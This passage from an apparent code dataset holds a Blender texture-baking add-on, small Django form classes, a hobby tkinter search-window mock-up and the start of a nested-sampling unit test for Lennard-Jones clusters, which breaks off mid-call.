-Bram\n\nbl_info = {\n \"name\": \"BRM_BakeUI\",\n \"category\": \"3D View\",\n \"blender\": (2, 80, 0),\n \"author\": \"Bram Eulaers\",\n \"description\": \"Simple texture baking UI for fast iteration. Can be found in the Tools panel.\"\n }\n\nimport bpy\nimport os\nimport bmesh\nfrom bpy.props import EnumProperty, BoolProperty, StringProperty, FloatProperty, IntProperty\n\n\n\ndef unhide(objectType):\n if bpy.data.objects.get(objectType) is None:\n for o in bpy.data.collections[objectType].objects:\n o.hide_viewport = False\n else:\n bpy.data.objects[objectType].hide_viewport = False\n\ndef hide(objectType):\n if bpy.data.objects.get(objectType) is None:\n for o in bpy.data.collections[objectType].objects:\n o.hide_viewport = True\n else:\n bpy.data.objects[objectType].hide_viewport = True\n\n\nclass BRM_BakeUIPanel(bpy.types.Panel):\n \"\"\"BRM_BakeUIPanel Panel\"\"\"\n bl_label = \"BRM Bake\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = \"UI\"\n bl_category = \"Bake\"\n\n\n def draw_header(self, _):\n layout = self.layout\n layout.label(text=\"\", icon='SCENE')\n\n def draw(self, context):\n layout = self.layout\n\n box = layout.box()\n col = box.column(align=True)\n\n row = col.row(align = True)\n row.prop(context.scene, \"lowpolyGroup\", text=\"\", icon=\"GROUP\")\n if context.scene.lowpolyGroup is True:\n row.prop_search(context.scene, \"lowpoly\", bpy.data, \"collections\", text=\"\", icon=\"MESH_ICOSPHERE\")\n if context.scene.lowpolyGroup is False:\n row.prop_search(context.scene, \"lowpoly\", context.scene, \"objects\", text=\"\", icon=\"MESH_ICOSPHERE\")\n \n \n\n if context.scene.lowpolyActive is True:\n hideicon = \"HIDE_OFF\"\n if context.scene.lowpolyActive is False:\n hideicon = \"HIDE_ON\"\n op = row.operator(\"brm.bakeuihide\", text=\"\", icon=hideicon)\n op.targetmesh = \"lowpoly\"\n \n row = col.row(align = True)\n\n row.prop(context.scene, \"hipolyGroup\", text=\"\", icon=\"GROUP\")\n if context.scene.hipolyGroup is True:\n row.prop_search(context.scene, \"hipoly\", bpy.data, \"collections\", text=\"\", icon=\"MESH_UVSPHERE\")\n if context.scene.hipolyGroup is False:\n row.prop_search(context.scene, \"hipoly\", context.scene, \"objects\", text=\"\", icon=\"MESH_UVSPHERE\")\n\n row.enabled = not context.scene.UseLowOnly\n \n \n\n if context.scene.hipolyActive is True:\n hideicon = \"HIDE_OFF\"\n if context.scene.hipolyActive is False:\n hideicon = \"HIDE_ON\"\n op = row.operator(\"brm.bakeuihide\", text=\"\", icon=hideicon)\n op.targetmesh = \"hipoly\"\n\n \n\n col = box.column(align=True)\n row = col.row(align = True)\n row.operator(\"brm.bakeuitoggle\", text=\"Toggle hi/low\", icon=\"FILE_REFRESH\")\n #row.prop(context.scene, \"UseBlenderGame\", icon=\"MESH_UVSPHERE\", text=\"\")\n\n col = layout.column(align=True)\n\n col.separator()\n row = col.row(align = True)\n row.prop(context.scene.render.bake, \"cage_extrusion\", text=\"Ray Distance\")\n row.prop(context.scene, \"cageEnabled\", icon=\"OBJECT_DATAMODE\", text=\"\")\n row = col.row(align = True)\n #row.enabled = context.scene.cageEnabled\n \n if context.scene.cageEnabled:\n op = row.prop_search(context.scene, \"cage\", bpy.data, \"objects\", text=\"\", icon=\"MESH_UVSPHERE\")\n #op.enabled = context.scene.cageEnabled\n \n col.separator()\n\n box = layout.box()\n col = box.column(align=True)\n\n row = col.row(align = True)\n row.label(text=\"Width:\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"REMOVE\").target = \"width/2\"\n row.prop(context.scene, \"bakeWidth\", text=\"\")\n 
row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"ADD\").target = \"width*2\"\n \n row = col.row(align = True)\n row.label(text=\"Height:\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"REMOVE\").target = \"height/2\"\n row.prop(context.scene, \"bakeHeight\", text=\"\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"ADD\").target = \"height*2\"\n row = col.row(align = True)\n row.label(text=\"Padding:\")\n row.prop(context.scene.render.bake, \"margin\", text=\"\")\n \n \n\n col = layout.column(align=True)\n col.separator()\n col.prop(context.scene, 'bakeFolder', text=\"\")\n row = col.row(align = True)\n row.label(text=\"Filename:\")\n row.prop(context.scene, \"bakePrefix\", text=\"\")\n \n col.separator()\n\n box = layout.box()\n col = box.column(align=True)\n \n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeNormal\", icon=\"SHADING_RENDERED\", text=\"Tangent Normal\")\n if context.scene.bakeNormal:\n row.prop(context.scene, \"samplesNormal\", text=\"\")\n\n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeObject\", icon=\"SHADING_RENDERED\", text=\"Object Normal\")\n if context.scene.bakeObject:\n row.prop(context.scene, \"samplesObject\", text=\"\")\n row = col.row(align = True)\n row.prop(context.scene, \"bakeAO\", icon=\"SHADING_SOLID\", text=\"Occlusion\")\n if context.scene.bakeAO:\n row.prop(context.scene, \"samplesAO\", text=\"\")\n \n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeColor\", icon=\"SHADING_TEXTURE\", text=\"Color\")\n if context.scene.bakeColor:\n row.prop(context.scene, \"samplesColor\", text=\"\")\n\n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeRoughness\", icon=\"SHADING_TEXTURE\", text=\"Roughness\")\n if context.scene.bakeRoughness:\n row.prop(context.scene, \"samplesRoughness\", text=\"\")\n\n row = col.row(align = True)\n row.prop(context.scene, \"bakeUV\", icon=\"SHADING_WIRE\", text=\"UV Snapshot\")\n \n \n \n col = layout.column(align=True)\n col.separator()\n row = col.row(align = True)\n op = row.operator(\"brm.bake\", text=\"BAKE\", icon=\"RENDER_RESULT\")\n row.prop(context.scene, \"UseLowOnly\", icon=\"MESH_ICOSPHERE\", text=\"\")\n \n\n\n\n\n\n\n\n\n\n\n\nclass BRM_BakeUIToggle(bpy.types.Operator):\n \"\"\"toggle lowpoly/hipoly\"\"\"\n bl_idname = \"brm.bakeuitoggle\"\n bl_label = \"Toggle\"\n bl_options = {\"UNDO\"}\n\n def execute(self, context):\n\n if bpy.context.object.mode == 'EDIT':\n bpy.ops.object.mode_set(mode='OBJECT')\n\n #test lowpoly/hipoly exists\n if bpy.data.objects.get(context.scene.lowpoly) is None and not context.scene.lowpoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid lowpoly object or group!\")\n return {'FINISHED'}\n if bpy.data.objects.get(context.scene.hipoly) is None and not context.scene.hipoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid hipoly object or group!\")\n return {'FINISHED'}\n\n if context.scene.lowpolyActive is True:\n context.scene.lowpolyActive = False\n hide(context.scene.lowpoly)\n context.scene.hipolyActive = True\n unhide(context.scene.hipoly)\n else:\n context.scene.lowpolyActive = True\n unhide(context.scene.lowpoly)\n context.scene.hipolyActive = False\n hide(context.scene.hipoly)\n\n return {'FINISHED'}\n\n\n\n\n\n\n\nclass BRM_BakeUIIncrement(bpy.types.Operator):\n \"\"\"multiply/divide 
value\"\"\"\r\n    bl_idname = \"brm.bakeuiincrement\"\r\n    bl_label = \"increment\"\r\n\r\n    # Blender 2.8x requires operator properties to be declared as annotations\r\n    target: bpy.props.StringProperty()\r\n\r\n    def execute(self, context):\r\n        if self.target == \"width/2\" and context.scene.bakeWidth > 4:\r\n            context.scene.bakeWidth = context.scene.bakeWidth // 2\r\n        if self.target == \"width*2\":\r\n            context.scene.bakeWidth = context.scene.bakeWidth * 2\r\n        if self.target == \"height/2\" and context.scene.bakeHeight > 4:\r\n            context.scene.bakeHeight = context.scene.bakeHeight // 2\r\n        if self.target == \"height*2\":\r\n            context.scene.bakeHeight = context.scene.bakeHeight * 2\r\n        return {'FINISHED'}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass BRM_BakeUIHide(bpy.types.Operator):\r\n    \"\"\"hide object\"\"\"\r\n    bl_idname = \"brm.bakeuihide\"\r\n    bl_label = \"hide\"\r\n    bl_options = {\"UNDO\"}\r\n\r\n    # Blender 2.8x requires operator properties to be declared as annotations\r\n    targetmesh: bpy.props.StringProperty()\r\n\r\n    def execute(self, context):\r\n\r\n        #test lowpoly/hipoly exists\r\n        \r\n        if bpy.context.object.mode == 'EDIT':\r\n            bpy.ops.object.mode_set(mode='OBJECT')\r\n        \r\n\r\n        if self.targetmesh == \"lowpoly\":\r\n\r\n            if bpy.data.objects.get(context.scene.lowpoly) is None and not context.scene.lowpoly in bpy.data.collections:\r\n                self.report({'WARNING'}, \"Select a valid lowpoly object or collection!\")\r\n                return {'FINISHED'}\r\n\r\n            else:\r\n                if context.scene.lowpolyActive is True:\r\n                    context.scene.lowpolyActive = False\r\n                    hide(context.scene.lowpoly)\r\n                else:\r\n                    context.scene.lowpolyActive = True\r\n                    unhide(context.scene.lowpoly)\r\n\r\n        if self.targetmesh == \"hipoly\":\r\n\r\n            if bpy.data.objects.get(context.scene.hipoly) is None and not context.scene.hipoly in bpy.data.collections:\r\n                self.report({'WARNING'}, \"Select a valid hipoly object or collection!\")\r\n                return {'FINISHED'}\r\n\r\n            else:\r\n                if context.scene.hipolyActive is True:\r\n                    context.scene.hipolyActive = False\r\n                    hide(context.scene.hipoly)\r\n                else:\r\n                    context.scene.hipolyActive = True\r\n                    unhide(context.scene.hipoly)\r\n\r\n        return {'FINISHED'}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass BRM_Bake(bpy.types.Operator):\r\n    \"\"\"Bake and save textures\"\"\"\r\n    bl_idname = \"brm.bake\"\r\n    bl_label = \"bake\"\r\n    bl_options = {\"UNDO\"}\r\n    \r\n\r\n    def execute(self, context): \r\n        \r\n        #test if everything is set up OK first:\r\n        #test folder\r\n        hasfolder = os.access(context.scene.bakeFolder, os.W_OK)\r\n        if hasfolder is False:\r\n            self.report({'WARNING'}, \"Select a valid export folder!\")\r\n            return {'FINISHED'}\r\n\r\n\r\n        #test lowpoly/hipoly/cage exists\r\n        if bpy.data.objects.get(context.scene.lowpoly) is None and not context.scene.lowpoly in bpy.data.collections:\r\n            self.report({'WARNING'}, \"Select a valid lowpoly object or collection!\")\r\n            return {'FINISHED'}\r\n        if bpy.data.objects.get(context.scene.hipoly) is None and not context.scene.hipoly in bpy.data.collections and not context.scene.UseLowOnly:\r\n            self.report({'WARNING'}, \"Select a valid hipoly object or collection!\")\r\n            return {'FINISHED'}\r\n        if bpy.data.objects.get(context.scene.cage) is None and context.scene.cageEnabled:\r\n            self.report({'WARNING'}, \"Select a valid cage object!\")\r\n            return {'FINISHED'}\r\n\r\n\r\n        #test if lowpoly, highpoly and cage objects are actually models\r\n        lowpolymeshes = 0\r\n        if bpy.data.objects.get(context.scene.lowpoly) is None:\r\n            for o in bpy.data.collections[context.scene.lowpoly].objects:\r\n                if o.type == 'MESH':\r\n                    lowpolymeshes+=1\r\n        else:\r\n            if bpy.data.objects[context.scene.lowpoly].type == 'MESH':\r\n                lowpolymeshes = 1\r\n        if lowpolymeshes == 0:\r\n            self.report({'WARNING'}, \"lowpoly needs to have a mesh!\")\r\n            return {'FINISHED'} \r\n        \r\n        hipolymeshes = 0\r\n        if bpy.data.objects.get(context.scene.hipoly) is None:\r\n            for o in 
bpy.data.collections[context.scene.hipoly].objects:\n if o.type == 'MESH':\n hipolymeshes+=1\n else:\n if bpy.data.objects[context.scene.hipoly].type == 'MESH':\n hipolymeshes = 1\n if hipolymeshes == 0:\n self.report({'WARNING'}, \"hipoly needs to have a mesh!\")\n return {'FINISHED'}\n \n if context.scene.cageEnabled and bpy.data.objects[context.scene.cage].type != 'MESH':\n self.report({'WARNING'}, \"cage needs to be a mesh!\")\n return {'FINISHED'}\n\n \n #setup\n\n #1 unhide everything to be baked\n if not context.scene.UseLowOnly:\n unhide(context.scene.hipoly)\n unhide(context.scene.lowpoly)\n bpy.ops.object.hide_view_clear() #temporary until I figure out how hiding is handled\n \n #2 make sure we are in object mode and nothing is selected\n if bpy.context.object.mode == 'EDIT':\n bpy.ops.object.mode_set(mode='OBJECT')\n bpy.ops.object.select_all(action='DESELECT')\n\n #3 setup lowpoly for baking\n lowpolyobject = \"null\"\n orig_lowpoly = None\n\n #if collection, create temporary lowpoly object\n if bpy.data.objects.get(context.scene.lowpoly) is None: \n for o in bpy.data.collections[context.scene.lowpoly].objects:\n if o.type == 'MESH':\n o.hide_viewport = False\n o.select_set(state=True)\n context.view_layer.objects.active = o\n o.hide_render = True\n #duplicate selected and combine into new object\n bpy.ops.object.duplicate()\n bpy.ops.object.join()\n bpy.ops.object.transform_apply(location=False, rotation=True, scale=True)\n lowpolyobject = bpy.context.selected_objects[0].name\n bpy.data.objects[lowpolyobject].hide_render = False\n else:\n bpy.data.objects[context.scene.lowpoly].hide_viewport = False\n bpy.data.objects[context.scene.lowpoly].hide_render = False\n bpy.data.objects[context.scene.lowpoly].select_set(state=True)\n orig_lowpoly = bpy.data.objects[context.scene.lowpoly]\n lowpolyobject = context.scene.lowpoly\n\n #4 test if lowpoly has a material and UV\n if len(bpy.data.objects[lowpolyobject].data.materials) == 0:\n if context.scene.lowpolyGroup:\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[lowpolyobject].select_set(state=True)\n bpy.ops.object.delete(use_global=False)\n self.report({'WARNING'}, \"Material required on low poly mesh!\")\n return {'FINISHED'}\n\n if len(bpy.data.objects[lowpolyobject].data.uv_layers) == 0:\n if context.scene.lowpolyGroup:\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[lowpolyobject].select_set(state=True)\n bpy.ops.object.delete(use_global=False)\n self.report({'WARNING'}, \"low poly mesh has no UV!\")\n return {'FINISHED'}\n\n #5 remember render engine and switch to CYCLES for baking\n orig_renderer = bpy.data.scenes[bpy.context.scene.name].render.engine\n bpy.data.scenes[bpy.context.scene.name].render.engine = \"CYCLES\"\n\n #6 create temporary bake image and material\n bakeimage = bpy.data.images.new(\"BakeImage\", width=context.scene.bakeWidth, height=context.scene.bakeHeight)\n bakemat = bpy.data.materials.new(name=\"bakemat\")\n bakemat.use_nodes = True\n\n #7 select hipoly target\n if not context.scene.UseLowOnly:\n #select hipoly object or collection:\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n if o.type == 'MESH':\n o.hide_viewport = False\n o.hide_render = False\n o.select_set(state=True)\n else:\n bpy.data.objects[context.scene.hipoly].hide_viewport = False\n bpy.data.objects[context.scene.hipoly].hide_render = False\n bpy.data.objects[context.scene.hipoly].select_set(state=True)\n\n #8 select lowpoly 
target\n bpy.context.view_layer.objects.active = bpy.data.objects[lowpolyobject]\n\n #9 select lowpoly material and create temporary render target\n orig_mat = bpy.context.active_object.data.materials[0]\n bpy.context.active_object.data.materials[0] = bakemat\n node_tree = bakemat.node_tree\n node = node_tree.nodes.new(\"ShaderNodeTexImage\")\n node.select = True\n node_tree.nodes.active = node\n node.image = bakeimage\n\n #10 check if theres a cage to be used\n if context.scene.cageEnabled:\n bpy.context.scene.render.bake.use_cage = True\n bpy.context.scene.render.bake.cage_object = bpy.data.objects[context.scene.cage]\n else:\n bpy.context.scene.render.bake.use_cage = False\n\n\n\n\n\n\n\n\n #11 bake all maps!\n if context.scene.bakeNormal and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesNormal\n bpy.ops.object.bake(type='NORMAL', use_clear=True, use_selected_to_active=True, normal_space='TANGENT')\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_normal.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n \n if context.scene.bakeObject and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesObject\n\n bpy.ops.object.bake(type='NORMAL', use_clear=True, use_selected_to_active=True, normal_space='OBJECT')\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_object.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n\n if context.scene.bakeAO:\n\n bpy.context.scene.cycles.samples = context.scene.samplesAO\n\n bpy.ops.object.bake(type='AO', use_clear=True, use_selected_to_active=not context.scene.UseLowOnly)\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_ao.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n\n if context.scene.bakeColor and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesColor\n bpy.context.scene.render.bake.use_pass_direct = False\n bpy.context.scene.render.bake.use_pass_indirect = False\n bpy.context.scene.render.bake.use_pass_color = True\n\n bpy.ops.object.bake(type='DIFFUSE', use_clear=True, use_selected_to_active=True)\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_color.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n \n if context.scene.bakeRoughness and not context.scene.UseLowOnly:\n\n bpy.context.scene.cycles.samples = context.scene.samplesRoughness\n\n bpy.ops.object.bake(type='ROUGHNESS', use_clear=True, use_selected_to_active=True)\n\n bakeimage.filepath_raw = context.scene.bakeFolder+context.scene.bakePrefix+\"_roughness.tga\"\n bakeimage.file_format = 'TARGA'\n bakeimage.save()\n\n #UV SNAPSHOT\n if context.scene.bakeUV:\n bpy.ops.object.editmode_toggle()\n bpy.ops.mesh.select_all(action='SELECT')\n bpy.ops.object.editmode_toggle()\n original_type = bpy.context.area.type\n bpy.context.area.type = \"IMAGE_EDITOR\"\n uvfilepath = context.scene.bakeFolder+context.scene.bakePrefix+\"_uv.png\"\n bpy.ops.uv.export_layout(filepath=uvfilepath, size=(context.scene.bakeWidth, context.scene.bakeHeight))\n bpy.context.area.type = original_type\n\n\n\n\n\n\n #cleanup temporary objects and materials\n bpy.ops.object.select_all(action='DESELECT')\n if not context.scene.lowpolyGroup:\n orig_lowpoly.select_set(state=True)\n bpy.data.images.remove(bakeimage)\n bakemat.node_tree.nodes.remove(node)\n bpy.data.materials.remove(bakemat)\n bpy.context.active_object.data.materials[0] = 
orig_mat\n bpy.data.scenes[bpy.context.scene.name].render.engine = orig_renderer\n\n if context.scene.lowpolyGroup:\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[lowpolyobject].select_set(state=True)\n bpy.ops.object.delete(use_global=False)\n\n #reload all textures\n for image in bpy.data.images:\n image.reload()\n\n #rehide back to original state \n if context.scene.lowpolyActive is True:\n if bpy.data.objects.get(context.scene.lowpoly) is None:\n for o in bpy.data.collections[context.scene.lowpoly].objects:\n o.hide_viewport = False\n context.view_layer.objects.active = o\n else:\n bpy.data.objects[context.scene.lowpoly].hide_viewport = False\n context.view_layer.objects.active = bpy.data.objects[context.scene.lowpoly]\n else:\n if bpy.data.objects.get(context.scene.lowpoly) is None:\n for o in bpy.data.collections[context.scene.lowpoly].objects:\n o.hide_viewport = True\n else:\n bpy.data.objects[context.scene.lowpoly].hide_viewport = True\n\n if not context.scene.UseLowOnly:\n if context.scene.hipolyActive is True:\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n o.hide_viewport = False\n context.view_layer.objects.active = o\n else:\n bpy.data.objects[context.scene.hipoly].hide_viewport = False\n context.view_layer.objects.active = bpy.data.objects[context.scene.hipoly]\n else:\n if bpy.data.objects.get(context.scene.hipoly) is None:\n for o in bpy.data.collections[context.scene.hipoly].objects:\n o.hide_viewport = True\n else:\n bpy.data.objects[context.scene.hipoly].hide_viewport = True\n\n return {'FINISHED'}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef register():\n bpy.utils.register_class(BRM_Bake)\n bpy.utils.register_class(BRM_BakeUIHide)\n bpy.utils.register_class(BRM_BakeUIPanel)\n bpy.utils.register_class(BRM_BakeUIToggle)\n bpy.utils.register_class(BRM_BakeUIIncrement)\n\n bpy.types.Scene.lowpoly = bpy.props.StringProperty (\n name = \"lowpoly\",\n default = \"lowpoly\",\n description = \"lowpoly object\",\n )\n bpy.types.Scene.lowpolyActive = bpy.props.BoolProperty (\n name = \"lowpolyActive\",\n default = True,\n description = \"lowpolyActive\",\n )\n bpy.types.Scene.lowpolyGroup = bpy.props.BoolProperty (\n name = \"lowpolyGroup\",\n default = False,\n description = \"enable lowpoly collection\",\n )\n bpy.types.Scene.hipoly = bpy.props.StringProperty (\n name = \"hipoly\",\n default = \"hipoly\",\n description = \"hipoly object or group\",\n )\n bpy.types.Scene.hipolyActive = bpy.props.BoolProperty (\n name = \"hipolyActive\",\n default = True,\n description = \"hipolyActive\",\n )\n bpy.types.Scene.hipolyGroup = bpy.props.BoolProperty (\n name = \"hipolyGroup\",\n default = False,\n description = \"enable hipoly collection\",\n )\n bpy.types.Scene.cage = bpy.props.StringProperty (\n name = \"cage\",\n default = \"cage\",\n description = \"cage object\",\n )\n bpy.types.Scene.cageActive = bpy.props.BoolProperty (\n name = \"cageActive\",\n default = True,\n description = \"cageActive\",\n )\n bpy.types.Scene.cageEnabled = bpy.props.BoolProperty (\n name = \"cageEnabled\",\n default = False,\n description = \"Enable cage object for baking\",\n )\n bpy.types.Scene.bakeNormal = bpy.props.BoolProperty (\n name = \"bakeNormal\",\n default = False,\n description = \"Bake Tangent Space Normal Map\",\n )\n bpy.types.Scene.bakeObject = bpy.props.BoolProperty (\n name = \"bakeObject\",\n default = False,\n description = \"Bake Object Space Normal Map\",\n )\n bpy.types.Scene.bakeAO = 
bpy.props.BoolProperty (\n name = \"bakeAO\",\n default = False,\n description = \"Bake Ambient Occlusion Map\",\n )\n bpy.types.Scene.bakeColor = bpy.props.BoolProperty (\n name = \"bakeColor\",\n default = False,\n description = \"Bake Albedo Color Map\",\n )\n bpy.types.Scene.bakeRoughness = bpy.props.BoolProperty (\n name = \"bakeRoughness\",\n default = False,\n description = \"Bake Roughness Map\",\n )\n bpy.types.Scene.bakeUV = bpy.props.BoolProperty (\n name = \"bakeUV\",\n default = False,\n description = \"Bake UV Wireframe Snapshot of Lowpoly Mesh\",\n )\n bpy.types.Scene.samplesNormal = bpy.props.IntProperty (\n name = \"samplesNormal\",\n default = 8,\n description = \"Tangent Space Normal Map Sample Count\",\n )\n bpy.types.Scene.samplesObject = bpy.props.IntProperty (\n name = \"samplesObject\",\n default = 8,\n description = \"Object Space Normal Map Sample Count\",\n )\n bpy.types.Scene.samplesAO = bpy.props.IntProperty (\n name = \"samplesAO\",\n default = 128,\n description = \"Ambient Occlusion Map Sample Count\",\n )\n bpy.types.Scene.samplesColor = bpy.props.IntProperty (\n name = \"samplesColor\",\n default = 1,\n description = \"samplesColor\",\n )\n bpy.types.Scene.samplesRoughness = bpy.props.IntProperty (\n name = \"samplesRoughness\",\n default = 1,\n description = \"samplesRoughness\",\n )\n bpy.types.Scene.bakeWidth = bpy.props.IntProperty (\n name = \"bakeWidth\",\n default = 512,\n description = \"Export Texture Width\",\n ) \n bpy.types.Scene.bakeHeight = bpy.props.IntProperty (\n name = \"bakeHeight\",\n default = 512,\n description = \"Export Texture Height\",\n )\n bpy.types.Scene.bakePrefix = bpy.props.StringProperty (\n name = \"bakePrefix\",\n default = \"export\",\n description = \"export filename\",\n )\n bpy.types.Scene.bakeFolder = bpy.props.StringProperty (\n name = \"bakeFolder\",\n default = \"destination folder\",\n description = \"destination folder\",\n subtype = 'DIR_PATH'\n )\n bpy.types.Scene.UseBlenderGame = bpy.props.BoolProperty (\n name = \"UseBlenderGame\",\n default = True,\n description = \"Use Blender Game for lowpoly display\",\n )\n bpy.types.Scene.UseLowOnly = bpy.props.BoolProperty (\n name = \"UseLowOnly\",\n default = False,\n description = \"Only bake lowpoly on itself\",\n )\n\ndef unregister():\n bpy.utils.unregister_class(BRM_Bake)\n bpy.utils.unregister_class(BRM_BakeUIHide)\n bpy.utils.unregister_class(BRM_BakeUIPanel)\n bpy.utils.unregister_class(BRM_BakeUIToggle)\n bpy.utils.unregister_class(BRM_BakeUIIncrement)\n\n del bpy.types.Scene.lowpoly\n del bpy.types.Scene.lowpolyActive\n del bpy.types.Scene.hipoly\n del bpy.types.Scene.hipolyActive\n del bpy.types.Scene.cage\n del bpy.types.Scene.cageActive\n del bpy.types.Scene.cageEnabled\n del bpy.types.Scene.bakeNormal\n del bpy.types.Scene.bakeObject\n del bpy.types.Scene.bakeAO\n del bpy.types.Scene.bakeColor\n del bpy.types.Scene.bakeRoughness\n del bpy.types.Scene.bakeUV\n del bpy.types.Scene.samplesNormal\n del bpy.types.Scene.samplesAO\n del bpy.types.Scene.samplesColor\n del bpy.types.Scene.samplesRoughness\n del bpy.types.Scene.samplesObject\n del bpy.types.Scene.bakeWidth\n del bpy.types.Scene.bakeHeight\n del bpy.types.Scene.bakeFolder\n del bpy.types.Scene.UseBlenderGame\n del bpy.types.Scene.UseLowOnly\n \nif __name__ == \"__main__\":\n register()\n","sub_path":"BRM_BakeUI.py","file_name":"BRM_BakeUI.py","file_ext":"py","file_size_in_byte":28439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"282509383","text":"from django import forms\n\n\nclass InputAutomata(forms.Form):\n text = forms.CharField(label='Post:', max_length=2000,\n widget=forms.Textarea(attrs={'rows': '10', 'cols': '50'}))\n file = forms.FileField()\n\n\nclass InputWord(forms.Form):\n word = forms.CharField()\n\n\nclass InputInt(forms.Form):\n number = forms.IntegerField(max_value=5, min_value=1)\n","sub_path":"mysite/automata/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"67940523","text":"from tkinter import *\n#from tkinter.ttk import *\nfrom tkinter import scrolledtext\nfrom tkinter import Menu\n\nwindow = Tk()\n\nwindow.title(\"SEARCH@gs_ANYTHING HERE\")\nwindow.geometry('700x300')\n\ntxt = scrolledtext.ScrolledText(window, width=40, height=10)\n\ntxt.grid(column=25, row=100)\n\nlbl = Label (window, text=\"www.GUNJAN.in\", font=(\"Times new Roman\", 40))\n\nlbl.grid(column=25, row=25)\n\ntxt = Entry(window, width=100)\n\ntxt.grid(column=25, row=50)\n\n\ndef clicked():\n lbl.configure(text=\"Request is Applied !!\",font=(\"Times new Roman\",10))\n lbl.grid(column=10,row=75)\n\nbtn = Button(window, text=\"Gunjan_Search\", bg='White', fg='Black',command=clicked)\n\nbtn.grid(column=25, row=75)\n\n# Creating a photoimage object to use image \nphoto = PhotoImage(file = r\"C:\\mr\\gunu.png\") \n\n# Resizing image to fit on button \nphotoimage = photo.subsample(20,20) \n\n# here, image option is used to \n# set image on button \n# compound option is used to align \n# image on LEFT side of button \nbtn2=Button(window, text = 'MIKE', image = photoimage, \n\t\t\t\t\tcompound = LEFT) \nbtn2.grid(column=50,row=50)\n#mainloop() \n\n\nmenu = Menu(window)\n\nnew_item = Menu(menu)\nnew_item1 = Menu(menu)\nnew_item2 = Menu(menu)\nnew_item3 = Menu(menu)\n\nnew_item.add_command(label='Images')\nnew_item.add_separator()\nnew_item.add_command(label='HIstroy')\nnew_item.add_separator()\nnew_item.add_command(label='new_ignotic tab')\nnew_item.add_separator()\nnew_item.add_command(label='help')\nnew_item.add_separator()\nnew_item.add_command(label='more tools')\nnew_item.add_separator()\nnew_item.add_command(label='Zoom - & +')\nnew_item.add_separator()\nnew_item.add_command(label='setting')\nnew_item.add_separator()\nnew_item.add_command(label='Exit')\nnew_item.add_separator()\nnew_item1.add_command(label='version 1.0')\nnew_item1.add_separator()\nnew_item2.add_command(label='MY GUNU IMAGE')\nnew_item2.add_separator()\nnew_item2.add_command(label='MY GUNU TUBE')\nnew_item2.add_separator()\nnew_item2.add_command(label='MPG PROGRAMMING')\nnew_item2.add_separator()\nnew_item3.add_command(label='gunjanshrimali1234@gmail.com')\nnew_item3.add_separator()\nnew_item3.add_command(label='gunjanshrimali407@gmail.com')\nnew_item3.add_separator()\nnew_item3.add_command(label='mpgsite09@gmail.com')\n\nmenu.add_cascade(label='Menu', menu=new_item)\nmenu.add_cascade(label='Gmail', menu=new_item3)\nmenu.add_cascade(label='GUNJAN APP', menu=new_item2)\nmenu.add_cascade(label='SIGN UP', menu=new_item1)\n\nwindow.config(menu=menu)\n\nwindow.mainloop()\n","sub_path":"front.py","file_name":"front.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97074238","text":"import unittest\nimport numpy as np\n\nfrom pele.thermodynamics import get_thermodynamic_information\n\n\nfrom sens._sens_exact import 
NestedSamplingSAExact\r\nfrom sens import get_all_normalmodes\r\nfrom sens.models._lj_tools import LJClusterSENS\r\n\r\nimport _test_ns_lj\r\n\r\nclass TestSENSExact_LJ(_test_ns_lj.TestNS_LJ):\r\n    def setUp(self):\r\n#        self.seed = 4\r\n#        np.random.seed(self.seed)\r\n        self.setUp1()\r\n    \r\n    def set_up_system(self):\r\n        self.natoms = 6\r\n        self.gmin = -12.7121\r\n        self.system = LJClusterSENS(self.natoms, 2.5)\r\n        self.ndof = 3*self.natoms - 6\r\n\r\n\r\n    def setUp1(self, nproc=1):\r\n        self.set_up_system()\r\n        self.nreplicas = 10\r\n        self.stepsize = 0.01\r\n        self.nproc = nproc\r\n        \r\n        self.database = self.system.create_database()\r\n        # add some minima to the database\r\n        bh = self.system.get_basinhopping(self.database, outstream=None)\r\n        while self.database.number_of_minima() < 2:\r\n            bh.run(1)\r\n        # compute the thermodynamic information\r\n        get_thermodynamic_information(self.system, 